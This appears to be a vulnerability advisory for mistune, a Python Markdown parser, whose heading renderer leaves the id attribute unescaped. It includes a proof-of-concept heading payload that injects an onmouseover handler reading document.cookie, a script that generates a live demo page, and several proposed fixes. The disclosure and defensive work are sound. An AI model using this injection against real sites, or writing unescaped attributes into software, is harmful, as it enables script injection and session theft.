Summary
HTMLRenderer.heading() builds the opening <hN> tag by string-concatenating the id attribute value directly into the HTML — with no call to escape(), safe_entity(), or any other sanitisation function. A double-quote character " in the id value terminates the attribute, allowing an attacker to inject arbitrary additional attributes (event handlers, src=, href=, etc.) into the heading element.
The default TOC hook assigns safe auto-incremented IDs (toc_1, toc_2, …) that never contain user text. However, the add_toc_hook() API accepts a caller-supplied heading_id callback. Deriving heading IDs from the heading text itself, to produce human-readable slug anchors like #installation or #getting-started, is a very common real-world use of this callback (documentation generators routinely do this). When the callback returns raw heading text, an attacker who controls heading content can break out of the id= attribute.
Details
File: src/mistune/renderers/html.py
def heading(self, text: str, level: int, **attrs: Any) -> str:
    tag = "h" + str(level)
    html = "<" + tag
    _id = attrs.get("id")
    if _id:
        html += ' id="' + _id + '"'  # ← _id is never escaped
    return html + ">" + text + "</" + tag + ">\n"
The text body (line content) is escaped upstream by the inline token renderer, which is why a " in text arrives already converted to &quot;. But _id arrives as a raw string directly from whatever the heading_id callback returned; no escaping occurs at any point in the pipeline.
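One possible fix is to escape the id value before concatenating it. The sketch below is a standalone function, not a patch to mistune itself: the name heading_with_escaped_id is hypothetical, and html.escape from the standard library stands in for whichever escaping helper the project would prefer.

```python
from html import escape
from typing import Any


def heading_with_escaped_id(text: str, level: int, **attrs: Any) -> str:
    """Hypothetical variant of heading() that escapes the id value."""
    tag = "h" + str(level)
    html = "<" + tag
    _id = attrs.get("id")
    if _id:
        # quote=True turns '"' into '&quot;', so the value cannot close the attribute.
        html += ' id="' + escape(str(_id), quote=True) + '"'
    # text is assumed to be escaped already by the inline renderer, as in the original.
    return html + ">" + text + "</" + tag + ">\n"


payload = 'foo" onmouseover="alert(document.cookie)" x="'
print(heading_with_escaped_id("foo", 2, id=payload))
```

With this change the payload stays inside the id value as inert text instead of becoming separate attributes.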
PoC
Step 1 — Establish the baseline (safe default IDs)
The script creates a parser with escape=True and the default add_toc_hook() (no custom heading_id callback). The default hook generates sequential numeric IDs:
md_safe = create_markdown(escape=True)
add_toc_hook(md_safe) # default: heading_id produces toc_1, toc_2, …
bl_src = "## Introduction\n"
bl_out, _ = md_safe.parse(bl_src)
Output — ID is auto-generated, no user text appears in it:
<h2 id="toc_1">Introduction</h2>
Step 2 — Add the realistic trigger: a text-based heading_id callback
Deriving an anchor ID from the heading text is the standard real-world pattern (slugifiers, mkdocs, sphinx, jekyll all do this). The PoC uses the simplest possible version — return the raw heading text unchanged — to show the vulnerability without any extra transformation:
def raw_id(token, index):
    return token.get("text", "")  # returns raw heading text as the ID
md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)
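For contrast, a callback that only ever emits characters from a small allowlist cannot produce a quote at all. The following is a minimal sketch under assumptions: slug_id is a hypothetical name, the token is treated as a plain dict with a "text" key as in raw_id above, and the toc_N fallback simply imitates the default ID style shown in Step 1.

```python
import re


def slug_id(token, index):
    """Hypothetical heading_id callback: allowlist slug with an index fallback."""
    text = token.get("text", "").lower()
    # Collapse every run of characters outside [a-z0-9] into a single hyphen.
    slug = re.sub(r"[^a-z0-9]+", "-", text).strip("-")
    # Fall back to a positional ID when nothing safe is left.
    return slug or "toc_" + str(index + 1)


payload = 'foo" onmouseover="alert(document.cookie)" x="'
print(slug_id({"text": "Getting Started"}, 0))
print(slug_id({"text": payload}, 1))
```

It would be registered the same way as raw_id, via add_toc_hook(md, heading_id=slug_id). The sketch does not deduplicate colliding slugs, and headings with no ASCII letters or digits fall back to the positional ID.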
Step 3 — Craft the exploit payload
Construct a heading whose text contains a double-quote followed by an injected attribute:
## foo" onmouseover="alert(document.cookie)" x="
When raw_id is called, token["text"] is foo" onmouseover="alert(document.cookie)" x=". This is passed verbatim to heading() as the id attribute value.
Step 4 — Observe attribute breakout in the output
ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n'
ex_out, _ = md_vuln.parse(ex_src)
Actual output:
<h2 id="foo" onmouseover="alert(document.cookie)" x="">foo&quot; onmouseover=&quot;alert(document.cookie)&quot; x=&quot;</h2>
Note: the heading body text is correctly escaped (each " becomes &quot;), but the id= attribute is not. A user who moves their mouse over the heading triggers alert(document.cookie). Any JavaScript payload can be substituted.
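The breakout can also be confirmed without a browser by asking an HTML parser which attributes it sees on the heading. This is an illustrative check using only the standard library; AttrCollector is a hypothetical helper, and the opening tag is copied from the Step 4 output with the body shortened, since only the attributes matter here.

```python
from html.parser import HTMLParser


class AttrCollector(HTMLParser):
    """Records the attributes of every start tag the parser sees."""

    def __init__(self):
        super().__init__()
        self.tags = []

    def handle_starttag(self, tag, attrs):
        self.tags.append((tag, dict(attrs)))


# Opening tag from the Step 4 output; body shortened for brevity.
ex_out = '<h2 id="foo" onmouseover="alert(document.cookie)" x="">heading body</h2>\n'

collector = AttrCollector()
collector.feed(ex_out)
tag, attrs = collector.tags[0]
print(tag, sorted(attrs))
```

A parser that reports onmouseover as an attribute of its own, rather than as part of the id value, shows that the injected text has left the attribute.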
Script
A verification script reproduces the issue. It writes an HTML page that shows the attribute breakout as rendered in the browser.
#!/usr/bin/env python3
"""H2: HTMLRenderer.heading() inserts the id= value verbatim — no escaping."""
import os, html as h
from mistune import create_markdown
from mistune.toc import add_toc_hook
def raw_id(token, index):
    return token.get("text", "")
# --- baseline ---
md_safe = create_markdown(escape=True)
add_toc_hook(md_safe)
bl_file = "baseline_h2.md"
bl_src = "## Introduction\n"
with open(os.path.join(os.getcwd(), bl_file), "w") as f:
    f.write(bl_src)
bl_out, _ = md_safe.parse(bl_src)
print(f"[{bl_file}]\n{bl_src}")
print("[output — id=toc_1, no user content, safe]")
print(bl_out)
# --- exploit ---
md_vuln = create_markdown(escape=True)
add_toc_hook(md_vuln, heading_id=raw_id)
ex_file = "exploit_h2.md"
ex_src = '## foo" onmouseover="alert(document.cookie)" x="\n'
with open(os.path.join(os.getcwd(), ex_file), "w") as f:
    f.write(ex_src)
ex_out, _ = md_vuln.parse(ex_src)
print(f"[{ex_file}]\n{ex_src}")
print("[output — heading_id returns raw text, id= not escaped]")
print(ex_out)
# --- HTML report ---
CSS = """
body{font-family:-apple-system,sans-serif;max-width:1200px;margin:40px auto;background:#f0f0f0;color:#111;padding:0 24px}
h1{font-size:1.3em;border-bottom:3px solid #333;padding-bottom:8px;margin-bottom:4px}
p.desc{color:#555;font-size:.9em;margin-top:6px}
.case{margin:24px 0;border-radius:8px;overflow:hidden;border:1px solid #ccc;box-shadow:0 1px 4px rgba(0,0,0,.1)}
.case-header{padding:10px 16px;font-weight:bold;font-family:monospace;font-size:.85em}
.baseline .case-header{background:#d1fae5;color:#065f46}
.exploit .case-header{background:#fee2e2;color:#7f1d1d}
.panels{display:grid;grid-template-columns:1fr 1fr;background:#fff}
.panel{padding:16px}
.panel+.panel{border-left:1px solid #eee}
.panel h3{margin:0 0 8px;font-size:.68em;color:#888;text-transform:uppercase;letter-spacing:.07em}
pre{margin:0;padding:10px;background:#f6f6f6;border:1px solid #e0e0e0;border-radius:4px;font-size:.78em;white-space:pre-wrap;word-break:break-all}
.rlabel{font-size:.68em;color:#aaa;margin:10px 0 4px;font-family:monospace}
.rendered{padding:12px;border:1px dashed #ccc;border-radius:4px;min-height:20px;background:#fff;font-size:.9em}
"""
def case(kind, label, filename, src, out):
    return f"""
<div class="case {kind}">
<div class="case-header">{'BASELINE' if kind=='baseline' else 'EXPLOIT'} — {h.escape(label)}</div>
<div class="panels">
<div class="panel">
<h3>Input — {h.escape(filename)}</h3>
<pre>{h.escape(src)}</pre>
</div>
<div class="panel">
<h3>Output — HTML source</h3>
<pre>{h.escape(out)}</pre>
<div class="rlabel">↓ rendered in browser (hover the heading to trigger onmouseover)</div>
<div class="rendered">{out}</div>
</div>
</div>
</div>"""
page = f"""<!DOCTYPE html><html lang="en"><head><meta charset="UTF-8">
<title>H2 — Heading ID XSS</title><style>{CSS}</style></head><body>
<h1>H2 — Heading ID XSS (unescaped id= attribute)</h1>
<p class="desc">HTMLRenderer.heading() in renderers/html.py does html += ' id="' + _id + '"' with no escaping.
Triggered when heading_id callback returns raw heading text — the most common doc-generator pattern.</p>
{case("baseline", "Clean heading → sequential id=toc_1, safe", bl_file, bl_src, bl_out)}
{case("exploit", "Malicious heading → quotes break out of id=, onmouseover injected", ex_file, ex_src, ex_out)}
</body></html>"""
out_path = os.path.join(os.getcwd(), "report_h2.html")
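# The page contains non-ASCII characters and declares charset UTF-8, so write it as UTF-8.
with open(out_path, "w", encoding="utf-8") as f:
    f.write(page)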
print(f"\n[report] {out_path}")
Example Usage:
Once the script is run, open report_h2.html in the browser and observe the behaviour.
Impact
| Dimension | Assessment |
|---|---|
| Confidentiality | Session cookie / auth token theft via JavaScript execution triggered on mouse interaction |
| Integrity | DOM manipulation, phishing content injection, forced navigation |
| Availability | Injected script can freeze or crash the page |
Risk context: This vulnerability targets the most common customisation point for heading IDs. Any documentation site, wiki, or blog engine that generates slug-style anchors from heading text is vulnerable if it uses mistune's heading_id callback without independently sanitising the returned value.
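Applications that cannot change their existing callback could sanitise its return value with a thin wrapper. The sketch below is one such approach under assumptions: escaped_heading_id is a hypothetical helper, not part of mistune, and it relies only on the (token, index) callback signature used in the PoC.

```python
from html import escape


def escaped_heading_id(callback):
    """Wrap a heading_id callback so its return value is attribute-safe."""

    def wrapper(token, index):
        # quote=True also escapes '"' and "'", the characters that can end an attribute.
        return escape(str(callback(token, index)), quote=True)

    return wrapper


def raw_id(token, index):
    return token.get("text", "")


safe_raw_id = escaped_heading_id(raw_id)
print(safe_raw_id({"text": 'foo" onmouseover="x'}, 0))
```

The wrapped callback would be passed as heading_id=safe_raw_id. If another consumer of the ID escapes it again, the value would be double-escaped, so this is a stopgap and not a substitute for escaping inside the renderer.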
References